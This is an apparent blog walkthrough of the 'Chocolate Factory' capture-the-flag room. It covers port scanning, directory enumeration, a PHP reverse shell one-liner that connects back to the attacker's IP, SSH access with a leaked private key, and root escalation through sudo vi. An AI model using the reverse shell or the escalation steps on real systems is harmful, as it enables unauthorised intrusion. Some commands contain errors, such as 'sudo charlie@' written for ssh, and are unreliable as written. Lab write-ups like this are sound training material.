In this post, i would like to share a walkthrough of the Chocolate Factory Room.
This room is been considered difficulty rated as LOW machine
Let’s Start!
We need to deploy the machine for us to play with the machine
Once the machine is fully up within 5 minutes, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
Information Gathering on Chocolate Factory
There are multiple ports that have been open but the crucial port that caught my attention
- 21: csftpd 3.0.2
- 22: OpenSSH 7.6p1
- 80: Apache httpd 2.6.29
Let’s check what is stored inside the website.
Let’s start to enumerate the website by executing the command dirb <IP Address> /usr/share/wordlist/common.txt -X .php,.html, and hope that we found something useful.
We did find something useful which is the home.php directory
The page shows the area of the search column where you can key-in any command and EXECUTE button.
Let’s try out any command that works for Linux
The command below is uname -a
Let’s see what has been stored inside the server. Oh wow! I notice that key_rev_key
Let’s try to download the file by accessing the location in the browser as shown below
Sadly, it’s hard to read the file but i notice the key appears in the middle of the code.
It’s very hard for us to command via the browser. Let’s upload a shell so that we can access it using the terminal.
The shell that we can use in this situation such as follows:
php -r '$sock=fsockopen("ip-address",port);exec("/bin/sh -i <&3 >&3 2>&3");'
* Replace the IP-address with your own IP and own port
For this activity, i use 1234 as my port
Let’s read the user.txt file at /home/charlie directory
However, we cannot read the file because the permission is denied. Let’s see what is written in the teleport file by using the cat teleport
We need to copy-paste everything on the teleport and create the id_rsa on our machine.
For us to get access via ssh by running the command below
sudo charlie@<IP Address> -i id_rsa
SSH Access to the machine
Now, we can read the user.txt by using the charlie credentials
Got It! Now, we need to focus on root privileges access
Let’s run the command sudo -l
I notice that /usr/bin/vi can be used for us to gain root privileges access.
We can execute :!/bin/sh and press enter. We have successfully gained root access.
I don’t find root.txt but we found root.py on /root/ directory
Let’s run the root.py by executing with python. The key that we need to enter is the same key as the first questions on the challenges!
While we are using root privileges access, let’s find charlie password by going to /var/www/html directory
We need to read validate.php in order to retrieve charlie’s password
-THE END-
Happy Learning Guys!
No responses yet